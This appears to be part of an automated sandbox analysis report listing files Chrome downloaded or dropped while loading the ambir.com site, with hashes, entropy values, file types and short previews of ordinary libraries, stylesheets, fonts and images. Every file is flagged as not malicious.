                                                                                                                                                                                              SHA-256:4F7CB65AFC2F9082FC7BCFD54E7CC089C09F127F2090D208D29DE699680F605C
                                                                                                                                                                                              SHA-512:9467D375CC04E54B5E4133DA5E6D64D83158E5FD18329BFB256FC814D37817669E4DBD967FB6BFCDB983DF4E80789FA5B129761DB99F6F991EF8BFE2CC867B2E
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://static.zohocdn.com/forms/js/formsthirdpartylivejs.62943a8ee9919d8253e7be70bab3de1c.js
                                                                                                                                                                                              Preview:!function(factory){"function"==typeof define&&define.amd?define(["jquery"],factory):factory(jQuery)}(function($){var uuid,removeData,eventType,orig;function focusable(element,isTabIndexNotNaN){var map,mapName,img,nodeName=element.nodeName.toLowerCase();return"area"===nodeName?(mapName=(map=element.parentNode).name,!(!element.href||!mapName||"map"!==map.nodeName.toLowerCase())&&(!!(img=$("img[usemap='#"+mapName+"']")[0])&&visible(img))):(/^(input|select|textarea|button|object)$/.test(nodeName)?!element.disabled:"a"===nodeName&&element.href||isTabIndexNotNaN)&&visible(element)}function visible(element){return $.expr.filters.visible(element)&&!$(element).parents().addBack().filter(function(){return"hidden"===$.css(this,"visibility")}).length}$.ui=$.ui||{},$.extend($.ui,{version:"1.11.4",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38}}),$.fn.extend({scrollParent:function(includeHidd
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 1024x603, components 3
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):78918
                                                                                                                                                                                              Entropy (8bit):7.985905875518624
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:iNOv9b42q6X1/J7bBUL2wE/p7qta4TGHHcCHyz8aQGa:zv/qYb+L2wE/Rl4T+HcCHywGa
                                                                                                                                                                                              MD5:ED37A083BF7D84E7DFBE03B77AFF487D
                                                                                                                                                                                              SHA1:8556A83197E9EEDBD3C6A61294B63B9E97D6E7A3
                                                                                                                                                                                              SHA-256:939560FB6F5048FC92EA3A36491756663E27C481846AA9D439447F13C092E9D7
                                                                                                                                                                                              SHA-512:13A7ADBE3C222132BCF43EEE04A36AA907E4BBB2312A017181138FEC4FEDF25E790C732D8F04B7CF5D773035E9FC49B32CF9FD6D347B69249FADD957EA475F26
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:......JFIF.....`.`...........................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......[...."..........5...................................................................V.y.7 .eQr..Q.....b...w1.~.P>+F...g..\...S.......ty..mr.P.)...@.G!..^.Gs../.9..g.F7..$...0.8.-..H.....tC|.Esl.....+..F..r....e..l...HcQ. l....bdv.`29A.S.1.!....Q...).f..\X...V..a$c.f.cv.....Z.....>\ijL.#.;..F8....1'..>...C......\..........rr..p..z.......aH.Ct.u.k.n.a/).....=.V...c..^.r.m+O....=..ul.u.vLAC$..T.Dy=,M$..W..*u.m..[..#u...8=,A.y..g.......3..4.....m.=Zk...'4.*.,d.c..%... ..@..d.\^".A.i..m'_...Lr=.i..Y!.>+H8.)D.i...Z.ej.l........s.....w#...5...mG +.s.... ......c..|.'...U.C$X..E..F1w8....s.....{...#<.N9.TH{.'H.....F...A. Qp...X..%.u.f28&G.......o.J..0..M.l..G.DR.QFS... r...@.t...u.C*81^..q...].e..._...L"... .a.ds^.A .....[\..Eh/7...L....M^.C...q...Ds...;.>{B7.l.t..K^..?w.1C./.>.E.j..+..NRb....b.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4236
                                                                                                                                                                                              Entropy (8bit):7.9349802609583815
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:XAkpm3Hoo1S/APX50ysdFw9bhCrzP0n0fB6w8WHNKNnp:QkgUIR0yslsn0MD
                                                                                                                                                                                              MD5:CB15B7C3018188E8EAD5B425EA9D1709
                                                                                                                                                                                              SHA1:BFD36112C2FD5DAE379580CB9C1F3D2E84360C27
                                                                                                                                                                                              SHA-256:439849C66E0255C77DB8485D11461F410220458463F33128105D56A52924FA83
                                                                                                                                                                                              SHA-512:713B107FDED104987BD4213A42EDCD9D473586E430C46347C6EF4F2470831A5F91A35F0F9296C2E0C22ED5970D3E5973CBCA6D9A26D7C0492C604776A7E9A3A9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/uploads/2024/10/logo.png
                                                                                                                                                                                              Preview:RIFF....WEBPVP8Lx.../..N..'.L...H.,...$t..=...)......B.......\....6..............yp......o............m.....o..........m.....o..........m.....o......._..p..;..>D..w..Q.2.2..+.w....w.)......WM..~...f./...."O...a#.9ZH)M.=...........M.JE..x....s.u.RRl9v...........M....j\...V..............7`.!.K...R.A..#.N.Z.e.F.|<E.....q.......tD.u+.....'.ty.#.b.s.a.....nz.j.w_4H..:2Z....../...S?.....~.4.k0..<..1U...{....p|.kh.t9}rhl....4.q....]^.*....}...Lpn.....!..'?+*_.7..6H.........Tn5.0z^a.A...O....5.0.'.f0........ys..1~~..y.y.. ........e..c.q..V..~..p<YZ1_.C'.....S]6........?fU.....Q.^......o..b.A7....4.[!+..2.........GI........W...e..S.V..].d...K....P..8..UU..Z.XO[.3)m.. ....G....\.@.c.L.sG..s .....VC_.jC].2.....nA!...F........7?u :...%.......U.....4B....+....~p.X.$.3......}.JW.UWy...I...o+.`JJ".A....Y.y.....+.R.....R..... .\83x..K."..M.@...2.<.m[]9......24q.H......(.I...I-.........TU.i..^.....,...-.T.a....<.7.~..h]9.......2LtK...S.8.q6.@McU......P.U.(f...w
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65311)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):83981
                                                                                                                                                                                              Entropy (8bit):4.7735566283508355
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:YlMVM6MVM9MVMKMVMRsVMNdhwJHQ9Kll3ITRUHrt+z:sdhgw9kITRULt+z
                                                                                                                                                                                              MD5:3D5EF2BF867C4054A2F336CDBAD9E1DC
                                                                                                                                                                                              SHA1:07228D1FA3245EE156A27A353F45758A3207849F
                                                                                                                                                                                              SHA-256:A361E7885C36BACB3FD9CB068DA207C3B9329962CAC022D06E28923939F575E8
                                                                                                                                                                                              SHA-512:168DEB96B663FE4EEE8D39C78380864760FB912B34BF82CB6A7C36AA4B18B91944CCEFAD71A10F428810D0A6A818DDBAFF3AE7DB42264750DFB8B5A73A8EDA04
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
                                                                                                                                                                                              Preview:/*!. * Font Awesome Free 6.0.0-beta3 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2021 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.0
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65371)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):121260
                                                                                                                                                                                              Entropy (8bit):5.0979844613521985
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:ly3Gxw/jc/QWlJxtQ8IuiHlqLmzI4X8OAduFKbv2ctg2Bd8JP7ecQVvH1FS:Xw/o1BIuiHlqLmN8lDbNmPbh
                                                                                                                                                                                              MD5:2F624089C65F12185E79925BC5A7FC42
                                                                                                                                                                                              SHA1:8EB176C70B9CFA6871B76D6DC98FB526E7E9B3DE
                                                                                                                                                                                              SHA-256:EECE6E0C65B7007AB0EB1B4998D36DAFE381449525824349128EFC3F86F4C91C
                                                                                                                                                                                              SHA-512:9CDA3EC821C4CA7D2C98CC52B309DFFCE9D7EBF2B026E65394D6418DAB8A8532B473ECD3FAAE49382C7450585743AAC947D8E0E84B3C80FB83DAE65C6032EA4B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/themes/ambir/css/bootstrap.min.css
                                                                                                                                                                                              Preview:/*!. * Bootstrap v3.3.6 (http://getbootstrap.com). * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{margin:.67em 0;font-size:2em}mark{color:#000;background:#ff0}small{font-size:80%}sub,sup{position:relative;font-size:75%;line-height:0;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 13408, version 1.0
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13408
                                                                                                                                                                                              Entropy (8bit):7.985996562778236
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:+cFH4GkIebSTLOFnUiyLnVApb+QBR/X4RfsnYQgYuPLOa3ze/5jaFt9q4gan:+CYAqrUzMbF/4RcuOa3zc+n
                                                                                                                                                                                              MD5:39AFF03D2A35B1C80F210051F35D4B2B
                                                                                                                                                                                              SHA1:35E71E31BFF4893DA229049A3ABABBB552F46EA0
                                                                                                                                                                                              SHA-256:0A7FC3DE6341E5AB2853F213DBF792903CD35039DAA9530A649A20A877CCAC8A
                                                                                                                                                                                              SHA-512:9D491CABB8FC51D748FC9403696D6F73E4087B266B53CE99DD1B384EC310F3D53AFE208779F471629C65388B67E98AE804BEC7B84048D315274AB16C54E56B23
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2
                                                                                                                                                                                              Preview:wOF2......4`......lT..4.................................|.`..J.....`....Z..6.$..0. ..~. .,\...;.C<_.>..l...[.H.mR.....I.G.3.+H!%...p.Z...bZH..Ngw.J.X>l.D..G...Y...0)....^...."..PW.tI.u..Y.....?.O....J2 s.D!.e..3+......[........`....76F.F. .Q.T.....X...U..}b.?u...Y..Q......~~.......w..L..g..".y..?....j.........!D.[$.H..P....&..FD.....`c..........."A:,5mu`...k?{...,..e.s.H.W..L.9.$>`.4R....y...KQ=.l...*.2wr...C.w..PH......-...?....Q.@..I,.P.....J..h.R.M.5(.4.0.a...Z..0]z..Mf.D.[.P...U8...BU...."q....\.]`Y....W....3.I2..d1......Bv@.DO.,..2Oc.. .L..;..<9.t.B..+.!.Q....?.Z.8K.z.F~}.Y.......D.@7.O. .3v..E..'K.l ..@.^.Q$.%.Q..U..F.....>SP..qeJ.......C P...sB..j.E.jF.Z.v...,$60w.../(>!7-AF=%-:~.3.3.f...^.<.IiI ../....s.....0.._o...L..y....}{......../gI.OW.V..c).:..m....1.].X.?.?.mV.O.(.R.?......9..XM.....~.S_W.L.........tz...^..0`6).GV..V.0g.K...R.)#.d...D.!*.e3[...n.~...g.C.N........*.a._"....6.....W.j...s...zMM.....9.u.j...M.&aY..5...~q.......q.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 1200 x 313, 8-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):6430
                                                                                                                                                                                              Entropy (8bit):7.506037886242601
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:L4uHiQI1SCrJUDvCIieLjeK+dlwmQIpK2z9VV+osp48w+:MyitoKmpi4j2dlYIsAz+oT8f
                                                                                                                                                                                              MD5:FC4C80333DE74DA70B95D52EDA16A2F8
                                                                                                                                                                                              SHA1:50F75DBAD200668C9C9A19588F70DFE620EF79AD
                                                                                                                                                                                              SHA-256:91C51A0C3DEB99679A355A2D148E05ABA3918FD2670F43E2FCAD9BC3DB1D5240
                                                                                                                                                                                              SHA-512:1B25DA24A380A82D77ECC2115974D21B5E88772AE09F4868902330B1CF890AFAE310F4432D1BF515860162F74C60A7E6C2E709B2482AD53F9A0472BA5592D1E5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:.PNG........IHDR.......9......x)J....PLTEGpL.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(.h(2.$.....tRNS..0#.Q...&........ !."._y.........Uj..Vb\lcm.PagZ.f........6u{Lrdh}...C2GIFT^...v........|.......7H5......`(+@X-.:=pSw..nM?.........>1A3*,............./.;KOR.<.Y......9J.)ie
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (29764)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):224117
                                                                                                                                                                                              Entropy (8bit):5.2847672917177455
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:GzP7+0XpR0qR66zF+BFWUasN+dAy7bcCWxFg2S:UP7+pqTF+BI9dAgbcCWvo
                                                                                                                                                                                              MD5:1B09FD5EACBA9E1F9D0DBBDACC84440A
                                                                                                                                                                                              SHA1:393B7E1962D27DDEA9E83DB7C992AA06BDAB5C7C
                                                                                                                                                                                              SHA-256:BF302DDF9B70D308C77915F10FD24455C565E73795A0592DB958BE885698E2FB
                                                                                                                                                                                              SHA-512:8965B02A450CEADDBEBEC5193111DEB7D418D72526D29AD5889B4142060A19B21D0DD2542B8A59B41F8348A36556420EF8ED46365D57880EED2F7F3772258E9C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-804f7b28.min.js
                                                                                                                                                                                              Preview:..var wpcf7 = {. "api": {. "root": "https:\/\/ambir.com\/wp-json\/",. "namespace": "contact-form-7\/v1". },. "cached": 1.};.(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(t)&&(t=n.get(t)),Array.from(n.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVers
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (9242)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):18547
                                                                                                                                                                                              Entropy (8bit):5.342701968911617
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:Z9RjlRE8iSf4cPmgtV7uoOKIgxaxTovK3r3WhdMkI0KpXYv2kq:3LRkvYmgbUjTyiy3pd12kq
                                                                                                                                                                                              MD5:42D39F0018CF5D39CC897AFF30315BB7
                                                                                                                                                                                              SHA1:0CCAB04B9FA399D8397605B98AC874967B268E54
                                                                                                                                                                                              SHA-256:792FD8391BDA501BE23ED2A4717EDF153EB9956DDDFDA7B63CF1EB7281FE561B
                                                                                                                                                                                              SHA-512:96D8DDD464B504333F2E3C6414B8CFFE31400B1B83B38C6ED82B608D11228FB72F6E9CCD7F4EA415EAA1CE3CE74760DD864B7014CBBC5623659A6D86A9C481A1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://ambir.com/wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js
                                                                                                                                                                                              Preview:./*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(e){e.fn._fadeIn=e.fn.fadeIn;var t=e.noop||function(){},o=/MSIE/.test(navigator.userAgent),n=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),i=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);e.blockUI=function(e){d(window,e)},e.unblockUI=function(e){a(window,e)},e.growlUI=function(t,o,n,i){var s=e('<div class="growlUI"></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.block
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):2219
                                                                                                                                                                                              Entropy (8bit):5.409739127256831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:1OLNOlOLNVFZKOLNHOLNk3yOLN5AOLNMJc+umOLNY1N0xD:1OLNOlOLNVFZKOLNHOLNk3yOLNqOLNM0
                                                                                                                                                                                              MD5:A1B66AE4FBB0EFF2B25D263E7E0E3776
                                                                                                                                                                                              SHA1:3C2688F0D491CA74EA7150AF27F4232401D46767
                                                                                                                                                                                              SHA-256:ADF768C23E06CAA3676973294122E24048A1296AE400745BA47E08BD39276E06
                                                                                                                                                                                              SHA-512:A4E5CD3C596FDA473D5BF9B16AD25CE91ED5DC91265BCA9C24897DEE75F8D12EEFE56400098D46364411D06F414BCCDE5AFC53F18B15B2AACE104A7AD893D41C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              URL:https://fonts.googleapis.com/css?family=Roboto
                                                                                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2) format('woff2');. unicode-range: U+0370-0377
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (29764)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):224117
                                                                                                                                                                                              Entropy (8bit):5.2847672917177455
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:GzP7+0XpR0qR66zF+BFWUasN+dAy7bcCWxFg2S:UP7+pqTF+BI9dAgbcCWvo
                                                                                                                                                                                              MD5:1B09FD5EACBA9E1F9D0DBBDACC84440A
                                                                                                                                                                                              SHA1:393B7E1962D27DDEA9E83DB7C992AA06BDAB5C7C
                                                                                                                                                                                              SHA-256:BF302DDF9B70D308C77915F10FD24455C565E73795A0592DB958BE885698E2FB
                                                                                                                                                                                              SHA-512:8965B02A450CEADDBEBEC5193111DEB7D418D72526D29AD5889B4142060A19B21D0DD2542B8A59B41F8348A36556420EF8ED46365D57880EED2F7F3772258E9C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:..var wpcf7 = {. "api": {. "root": "https:\/\/ambir.com\/wp-json\/",. "namespace": "contact-form-7\/v1". },. "cached": 1.};.(()=>{"use strict";const e=window.wp.i18n,t=e=>Math.abs(parseInt(e,10)),a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=(e,t)=>{const n=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);n.has(t)&&(t=n.get(t)),Array.from(n.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const r=e.getAttribute("data-status");if(e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),r&&r!==t){e.classList.remove(r);const t={contactFormId:e.wpcf7.id,pluginVers
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:GIF image data, version 89a, 24 x 24
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3322
                                                                                                                                                                                              Entropy (8bit):7.21453501645913
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:HLAAgsXUTPwkYKrfO3kIH7PSeFUhOIM5GPmCM1UqKZkk0Nra:HLAAglT5IHOeFWN4GerDhk0Nra
                                                                                                                                                                                              MD5:79DE1B954774690FFF0E7345D82FAA25
                                                                                                                                                                                              SHA1:0B53F6EA9DC1A0AC7014013D0EB433878AAB1B7C
                                                                                                                                                                                              SHA-256:A7F44D3BC98F7B02879478758A8D3903EF51D1292F6B3A4FDAAD1DF616CB63CA
                                                                                                                                                                                              SHA-512:93D2688568013DED71064844A534E2DCB90DB594B34DE37645BBE19802B329E3D4AD11F0BC23AFD5884EAA0EC8FDF9C3D3E6BC0D2CC1AAAD1D43FB3EAF4E36F8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:GIF89a................444===MMMUUUVVVYYYaaaggghhhlll|||.............................................................................................!!!''')))555BBBNNNTTT]]]jjjttt{{{....................................................................................666999???iiinnn}}}.............................................###OOORRRmmm.......................................<<<@@@..........................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.-Made by Krasimira Nejcheva (www.loadinfo.net).!.....+.,.............pH.A #.rI,...B..T.-P..J<=.......0.T.3.*!.8cuB.......hDJ*.q..&+(..(+*.~..K...nJ.}.!K$....L).. .D*'.\.K&....B*$#)+$..........).....
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (32002)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57075
                                                                                                                                                                                              Entropy (8bit):5.359090811397082
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:EFu+Xw7Bfv61xzU/VlbD3X1C/R7x25EiC7Csp49il3Oe/pkpVq+005U:Mcq1YZjXQ1x25CpsAY1Xy
                                                                                                                                                                                              MD5:BAAD5123CADC45E68F08614054AB3700
                                                                                                                                                                                              SHA1:7FC12758C0FED5A9EA2697427961A50FABD82AB4
                                                                                                                                                                                              SHA-256:3A0109833B570C1981CD6465E8715CE4510C098FD4E687EB12894CC0FFD480A4
                                                                                                                                                                                              SHA-512:3BE54348E1E929DFCCAF23DC2FAA93BD56C300B03D4FC9CE40C87796309D78ED535F72AECEDCEF70BBA8EB1F861A773B240D41FE7ABFCC4D2D1D7603715C510C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:!function e(t,o,n){function r(s,a){if(!o[s]){if(!t[s]){var l="function"==typeof require&&require;if(!a&&l)return l(s,!0);if(i)return i(s,!0);var c=new Error("Cannot find module '"+s+"'");throw c.code="MODULE_NOT_FOUND",c}var u=o[s]={exports:{}};t[s][0].call(u.exports,function(e){var o=t[s][1][e];return r(o?o:e)},u,u.exports,e,t,o,n)}return o[s].exports}for(var i="function"==typeof require&&require,s=0;s<n.length;s++)r(n[s]);return r}({1:[function(e,t,o){!function(e,o){"undefined"!=typeof t&&t.exports?t.exports.browser=o():"function"==typeof define&&define.amd?define(o):this.bowser=o()}(0,function(){function e(e){function o(t){var o=e.match(t);return o&&o.length>1&&o[1]||""}var n,r,i,s=o(/(ipod|iphone|ipad)/i).toLowerCase(),a=!/like android/i.test(e)&&/android/i.test(e),l=o(/edge\/(\d+(\.\d+)?)/i),c=o(/version\/(\d+(\.\d+)?)/i),u=/tablet/i.test(e),h=!u&&/[^-]mobi/i.test(e);/opera|opr/i.test(e)?n={name:"Opera",opera:t,version:c||o(/(?:opera|opr)[\s\/](\d+(\.\d+)?)/i)}:/windows phone/i.te
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):18160
                                                                                                                                                                                              Entropy (8bit):7.9507935414647015
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:E6bVK9GIzUQWsZdSawiqS61S3z+Ai3Azy1tL62pW1l0Z86vjNPTN:E6pLIAw2aFqSWS3z+AMZ3k/6vhN
